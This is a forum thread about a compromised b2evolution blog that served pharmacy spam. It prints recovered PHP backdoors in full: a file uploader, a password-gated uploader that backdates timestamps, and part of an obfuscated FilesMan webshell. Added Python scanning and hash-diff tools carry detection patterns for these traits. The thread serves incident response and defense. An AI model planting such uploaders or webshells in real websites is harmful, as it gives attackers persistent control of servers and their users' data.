1 Nov 07, 2013 15:08    

I became aware of the fact that if one goes to mysite.com/doc - a pharmacy site page opens. Mysite.com is powered by b2evolution 4.1.7 (was 4.0.5 prior to the hack).

The /doc directory contains some CSS and HTML files. The question is, how did they get there?

Here are some relevant details:

  • I'm using shared hosting on Bluehost
  • After discovering the `doc` directory, I changed its permissions to 000 and shortly after that, another directory showed up - `doc3`, containing the same pharma store
  • Upon discovering that, I thought it was an unpatched problem in 4.0.5, so I upgraded to 4.1.7 - but in a few hours, the pharma site was back
  • I compared the directories of my freshly upgraded 4.1.7 with the one that is hacked and there are no differences in the files, nor are there new files, except: images in the /media directory, the `doc` directory itself, and the plugins I installed: akismet, recaptcha, google_analytics
  • When I was upgrading to 4.1.7, the install URL had an unusual thing in it: `mysite.com/install/index.php?dasya=true`. I didn't really pay attention to that, but I remember it wasn't there in earlier versions (and I've been using b2evo since 1.x days). It seems to be some form of malware, because there are a few other hits about it online - but nothing substantial, just people asking about what it is; no solutions or explanations so far.

While examining the previous snapshot of the hacked 4.0.5, I discovered:

  • ext.php in the root directory, which was a file uploading interface - the files would go straight to the root directory
  • a hidden file called `.thumbs_up.php` in the `/media/blogs/a` directory (where my images go)
  • a file called `readmed.php` in the google_analytics_plugin

There are multiple domains hosted on the same Bluehost account, and only one of them gets compromised (even though another one is also running b2evolution (v 3.3.3), in a different subdirectory).

Perhaps there is a server-side problem, not related to b2evo itself; but then... why are other directories not affected? At this point I have quite a lot of different clues, but nothing to glue them together yet. Any help will be greatly appreciated.

body of ext.php (prettified, originally it was a single line thing)

<?php
error_reporting(0);
@ini_set("display_errors", 0);
$var = $_SERVER['PHP_SELF'] . "?";
$form = '<form enctype="multipart/form-data" action="' . $var . '" method="POST"><input name="uploadFile" type="file"/><br/><input type="submit" value="Upload" /></form>';

if (!empty($_FILES['uploadFile']))
{
$self = dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self . DIRECTORY_SEPARATOR . $_FILES["uploadFile"]["name"]);
$time = filemtime($self);
print "OK";
}
else
{
print $form;
} ?>

body of .thumbs_up.php

<?php 
$auth_pass = "8a4bf282852bf4c49e17f0951f645e72"; 
$color = "#df5"; 
$default_action = "FilesMan"; 
$default_charset = "Windows-1251"; 
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x6
...
<snip>
...
Lq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B","."); 
?>

body of readmed.php

<?php error_reporting(0);
@ini_set("display_errors", 0);

$var= $_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING'];
$md5RandomPass  = "6c11824f3cbe6d65396edd61c0d27c47";
$form =<<<HTML
<form enctype="multipart/form-data" action="$var" method="POST">
<input name="uploadFile" type="file"/><br/>
<input type="submit" value="Upload" />
</form>
HTML;
if (md5($_REQUEST['pass']) != $md5RandomPass) {
exit();
}
if (!empty($_FILES['uploadFile'])) {
$self        = dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);

$time        = filemtime($self );
touch($self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"], $time);
print "OK";
} else {
print $form;
} ?>
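
The three scripts above share a handful of traits a defender can look for across a web root: a PHP file hidden as a dotfile inside an upload directory, an eval() of a decompressed/decoded payload hidden behind \xNN escapes and fed through preg_replace with the /e modifier, an uploader that saves files under whatever name the client supplied, a touch() that copies the directory's mtime onto the new file, and the FilesMan default action string. The scanner below is an added example written for this thread; it is not code from the original post or from b2evolution. The sample files it scans are constructed stand-ins modelled on the posted scripts (with placeholder payload and hash strings), and the list of "upload" directory names is a heuristic assumption.

```python
import os
import re
from typing import Dict, List

# Content indicators modelled on the three scripts posted in this thread. Each
# regex runs against the file text after \xNN escapes have been decoded, so the
# hex-obfuscated "\x65\x76\x61\x6C\x28..." in .thumbs_up.php is seen as "eval(".
CONTENT_INDICATORS = [
    ("eval of decoded payload",
     re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I)),
    ("preg_replace with /e modifier",
     re.compile(r"preg_replace\s*\(\s*[\"'][^\"']*/[a-zA-Z]*e[a-zA-Z]*[\"']")),
    ("upload saved under client-chosen file name",
     re.compile(r"move_uploaded_file\s*\([^;]*\$_FILES\s*\[[^\]]+\]\s*\[\s*[\"']name[\"']\s*\]")),
    ("mtime reset with touch()",
     re.compile(r"touch\s*\([^;]*,[^;]*\)")),
    ("md5 password gate",
     re.compile(r"md5\s*\(\s*\$_(?:REQUEST|POST|GET)\s*\[")),
    ("FilesMan webshell marker", re.compile(r"FilesMan")),
]

# Directory names under which a .php file is not expected (heuristic assumption).
UPLOAD_DIRS = {"media", "img", "images", "logos", "uploads"}

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_hex_escapes(text: str) -> str:
    """Replace PHP-style \\xNN escapes with the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_content(text: str) -> List[str]:
    """Return the names of every content indicator that matches the decoded text."""
    decoded = decode_hex_escapes(text)
    return [name for name, rx in CONTENT_INDICATORS if rx.search(decoded)]


def scan_path(relpath: str) -> List[str]:
    """Flag PHP files by where they sit and what they are called."""
    hits: List[str] = []
    parts = relpath.replace("\\", "/").split("/")
    name = parts[-1]
    if not name.lower().endswith(".php"):
        return hits
    if name.startswith("."):
        hits.append("hidden PHP file")
    if UPLOAD_DIRS.intersection(parts[:-1]):
        hits.append("PHP file inside an upload/image directory")
    return hits


def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a {relative_path: content} map; only files with at least one hit are returned."""
    report: Dict[str, List[str]] = {}
    for path, content in files.items():
        hits = scan_path(path) + scan_content(content)
        if hits:
            report[path] = hits
    return report


def scan_directory(root: str) -> Dict[str, List[str]]:
    """Walk a real web root and scan every .php file (dotfiles included)."""
    files: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.lower().endswith(".php"):
                full = os.path.join(dirpath, n)
                with open(full, "r", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return scan_files(files)


# Constructed sample tree: three stand-ins for the posted scripts, one PHP file
# in an image directory, and one benign file that must produce no hits.
SAMPLE_FILES = {
    "media/blogs/a/.thumbs_up.php": r'''<?php
$auth_pass = "CONSTRUCTED_MD5_PLACEHOLDER";
$default_action = "FilesMan";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'CONSTRUCTED_PAYLOAD'\x29\x29\x29\x3B",".");
?>''',
    "plugins/google_analytics_plugin/readmed.php": r'''<?php
if (md5($_REQUEST['pass']) != "CONSTRUCTED_MD5_PLACEHOLDER") { exit(); }
if (!empty($_FILES['uploadFile'])) {
    $self = dirname(__FILE__);
    move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);
    touch($self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"], filemtime($self));
}
?>''',
    "ext.php": r'''<?php
if (!empty($_FILES['uploadFile'])) {
    move_uploaded_file($_FILES["uploadFile"]["tmp_name"], dirname(__FILE__) . DIRECTORY_SEPARATOR . $_FILES["uploadFile"]["name"]);
    print "OK";
}
?>''',
    "skins/custom/img/63766.php": r'''<?php echo "ok"; ?>''',
    "inc/_main.inc.php": r'''<?php
function normalise_title($title) {
    return preg_replace("/\s+/", " ", trim($title));
}
?>''',
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(path, "->", ", ".join(hits))
```

Run scan_directory() against a copy of the web root rather than the live tree; the location rule will also flag legitimate PHP that a skin author has put under img/, so treat each hit as a file to read, not as a verdict.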

2 Nov 13, 2013 23:07

I wish I could answer how they got there because I had a similar issue within the past week with my host, Netfirms.

A non-active but still online version of 1.9.3 was suddenly found to have been compromised with a couple of rogue PHP scripts:

/public_html/xxxxxxxxxx/BLOGS-1.9.3/media/blogs/214473.php: SiteLock-PHP-BACKDOOR-GENERIC-md5-fz.UNOFFICIAL FOUND
/public_html/xxxxxxxxxx/BLOGS-1.9.3/skins/custom/img/63766.php: SiteLock-PHP-BACKDOOR-GENERIC-md5-fz.UNOFFICIAL FOUND

Another active site running B2 5.06 was also somehow infected with .Thumbs_up.

/public_html/yyyyyyyyyy/media/shared/global/logos/.thumbs_up.php: SiteLock-PHP-C99-WEBSHELL-1-b.UNOFFICIAL FOUND

I deleted the files and a couple of unused FTP accounts and have not had trouble since (knock wood). Makes me wonder if someone left a backdoor open somewhere.

3 Nov 14, 2013 10:55

Hi,

I can tell you that it is most likely not going to solve the problem - the scripts will be there again after a while; you've merely removed the symptoms, not the cause.

1. Do you use other CMSes on the same server? If yes, perhaps one of them could be the original source of the problem?
2. Does Netfirms also use CPanel (like Bluehost)? (maybe it is a CPanel issue?)

Sadly, I have to say that after deleting these files, they show up again shortly, so I am still in search of answers.
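
The reinfection described in this post, and the manual directory comparison in the first post, are what a content-hash baseline is for: hash a known-good tree once, re-hash the live tree later, and list what was added, changed or removed. Comparing by hash rather than by modification time matters here because readmed.php above copies the directory's mtime onto every file it writes with touch(), so a listing sorted by date shows nothing new. This is an added example for the thread, not code from the original posts or from b2evolution; every file name and byte string in the demo is constructed.

```python
import hashlib
import os
import tempfile
from typing import Dict, List


def hash_file(path: str) -> str:
    """SHA-256 of a file's content, read in chunks so large media files are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot_directory(root: str) -> Dict[str, str]:
    """Map every file under root (dotfiles included) to its content hash."""
    snap: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            snap[os.path.relpath(full, root).replace(os.sep, "/")] = hash_file(full)
    return snap


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files that appeared, changed or vanished since the baseline was taken."""
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
        "removed": sorted(set(baseline) - set(current)),
    }


def _write(root: str, relpath: str, data: bytes) -> str:
    """Helper for the demo: create relpath under root with the given bytes."""
    full = os.path.join(root, relpath)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)
    return full


def demo() -> Dict[str, List[str]]:
    """Build a constructed clean tree and a constructed live tree, then diff them.

    The live tree carries a planted file whose mtime is copied from a legitimate
    neighbour (the same trick readmed.php plays with touch()) plus one edited
    skin template. Neither change stands out by mtime; both show up by hash.
    """
    clean_files = {  # constructed stand-ins, not real b2evolution files
        "index.php": b"<?php /* constructed front controller */ ?>\n",
        "plugins/google_analytics_plugin/plugin_stub.php": b"<?php /* constructed plugin stub */ ?>\n",
        "skins/custom/index.main.php": b"<?php /* constructed skin template */ ?>\n",
        "media/blogs/a/photo.jpg": b"\xff\xd8\xff\xe0 constructed jpeg bytes",
    }
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        for rel, data in clean_files.items():
            _write(clean, rel, data)
            _write(live, rel, data)
        baseline = snapshot_directory(clean)

        # Plant a file and backdate it to its neighbour's mtime.
        planted = _write(live, "plugins/google_analytics_plugin/readmed.php",
                         b"<?php /* constructed stand-in for the uploader */ ?>\n")
        st = os.stat(os.path.join(live, "plugins/google_analytics_plugin/plugin_stub.php"))
        os.utime(planted, (st.st_atime, st.st_mtime))

        # Edit one legitimate file in place.
        _write(live, "skins/custom/index.main.php",
               b"<?php /* constructed skin template, edited */ ?>\n")

        return diff_snapshots(baseline, snapshot_directory(live))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In practice the baseline comes from a fresh download of the same b2evolution release plus your own skins and plugins, stored off the server; anything the diff lists under "added" inside media/, skins/ or a plugin directory is the first thing to read.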

4 Nov 15, 2013 14:26

There's a Joomla install that's in maintenance mode, but other than that it's only B2.

NetFirms has its own control panel.

I haven't looked through every folder, but so far I've not been notified of any questionable pages or scripts.
